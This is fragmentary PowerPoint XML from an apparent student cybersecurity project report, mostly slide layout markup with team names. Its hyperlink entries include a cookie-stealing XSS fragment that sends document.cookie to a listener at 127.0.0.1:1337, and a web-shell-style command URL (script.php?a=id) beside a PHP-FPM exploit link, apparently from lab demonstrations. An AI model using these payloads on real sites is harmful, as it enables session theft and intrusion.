        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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040"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3304282" y="1448224"/>
            <a:ext cx="3934778" cy="7147983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2040"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1785"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1530"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1275"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1275"/>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr sz="1275"/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr sz="1275"/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr sz="1275"/>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr sz="12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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA9666D-2769-5DDC-79BA-3511BB4CA3F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7E7355BF-9B2D-41F0-A8FA-FD1B938CA1C7}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B0D43E-6D6A-B87E-763B-78C6C423719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01BD94A-C3A7-023F-942B-4C805747FB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7629F628-973F-46FA-963C-BF8EBB688556}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="699311102"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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040"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3304282" y="1448224"/>
            <a:ext cx="3934778" cy="7147983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B056E0A-AD40-27B0-AB0C-5766CE652928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FB3A8A7F-8FB6-4825-B51F-5A6EEE4EDD5B}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FAFC121-72D3-1279-D8E8-3676C1D80B5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A40CC0B-BEBF-633E-CEE7-AF2D526D0D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F79B11DD-3D97-499C-8201-94872FCFB748}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1395689553"/>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1" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3"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63123C-928F-6A0A-97FF-A20DF3D5FE11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534988" y="534988"/>
            <a:ext cx="6702425" cy="1944687"/>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5A1141-C594-1AD1-13CB-6E4CB9A918B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534988" y="2678113"/>
            <a:ext cx="6702425" cy="63817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7015B-954F-735C-86C4-EE9AB88AE27F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534988" y="9323388"/>
            <a:ext cx="1747837" cy="534987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="765" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F15FBB48-C86B-40F2-9669-13C536889533}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52FC7577-9CA0-9802-107F-E3C8313B1E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574925" y="9323388"/>
            <a:ext cx="2622550" cy="534987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="765">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D36AA04-5D54-216A-DD7C-4E7856C9ACEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5489575" y="9323388"/>
            <a:ext cx="1747838" cy="534987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="765" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{65A4EB9F-A241-4BCF-A46B-9C59BACFF6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Lst>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
    <mc:Choice Requires="p15">
      <p:transition>
        <p15:prstTrans prst="fallOver"/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId14" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId16" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Fallback>
  </mc:AlternateContent>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="582613" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr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2pPr>
      <a:lvl3pPr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3pPr>
      <a:lvl4pPr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4pPr>
      <a:lvl5pPr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5pPr>
      <a:lvl6pPr marL="457200"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6pPr>
      <a:lvl7pPr marL="914400"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7pPr>
      <a:lvl8pPr marL="1371600"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8pPr>
      <a:lvl9pPr marL="1828800"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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="144463" indent="-144463" algn="l" defTabSz="582613" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="638"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1700" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="436563" indent="-144463" algn="l" defTabSz="582613" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="325"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1500" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="728663" indent="-144463" algn="l" defTabSz="582613" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="325"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1019175" indent="-144463" algn="l" defTabSz="582613" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="325"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1100" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1311275" indent="-144463" algn="l" defTabSz="582613" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="325"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1100" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="160305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6pPr>
      <a:lvl7pPr marL="189452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7pPr>
      <a:lvl8pPr marL="218598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8pPr>
      <a:lvl9pPr marL="247745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audio" Target="../media/audio1.wav"/><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audio" Target="../media/audio1.wav"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/submit/" TargetMode="Externa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eex/phuip-fpizdam/issues/1"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127.0.0.1:8080/script.php" TargetMode="External"/><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 Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/php/php-" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8080/script.php?a=id" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8080/script.ph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hyperlink" Target="https://twitter.com/d90pwn" TargetMode="External"/><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audio" Target="../media/audio1.wav"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ahack_ru"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127.0.0.1:1337/?cookie='+document.cookie"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2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/audio" Target="../media/audio1.wav"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:1337/?cookie=" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:1337/?cookie=,+do"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audio" Target="../media/audio1.wav"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:1337/?cookie=" TargetMode="Externa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icann.org/epp%23serverDeleteProhibited" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.markmonitor.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://icann.org/epp%23clientUpdateProhibited" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/audio" Target="../media/audio1.wav"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://icann.org/epp%23clientTransferProhibited" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/audio" Target="../media/audio1.wav"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://icann.org/epp%23clientDeleteProhibited" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://icann.org/epp%23serverUpdateProhibited" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:abusecomplaints@markmonitor.com" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://icann.org/epp%23serverTransferProhibited" TargetMode="Externa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icann.org/wicf/"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hyperlink" Target="https://marketplace.appsmart.com"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hyperlink" Target="http://www.NameBright.com"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hyperlink" Target="http://www.NameBright.com" TargetMode="External"/><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audio" Target="../media/audio1.wav"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.icann.org/epp%23clientTransferProhibited" TargetMode="Externa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46A77040-69F7-C6F5-740E-9A4FBBB993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025" y="609600"/>
            <a:ext cx="687705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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13527509-C136-1590-D8F9-CEABA73BDF5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1228725" y="1932856"/>
            <a:ext cx="5357813" cy="7992888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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1263"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>DOCUMENTATION ON CYBER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="11338"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>SECURITY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="11338"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B9BD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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Report on project</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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BY </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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    Team id : LTVIP2023DNIE04839</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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Team Leader : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Kucharla</a:t>
            </a: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 Harika</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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Team Member : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Kancharana</a:t>
            </a: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 Manohar</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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Team Member: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>peetha</a:t>
            </a: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 Akash</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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Team Member : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Jagana</a:t>
            </a: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 Jaswanth </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Avanthi’s</a:t>
            </a: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 Research &amp; Technological Academy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3500" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB512C30-904B-CB14-6288-252689D441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862" y="3301008"/>
            <a:ext cx="5724674"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5"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AD5A8013-AF3E-E139-E373-E835C71787CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
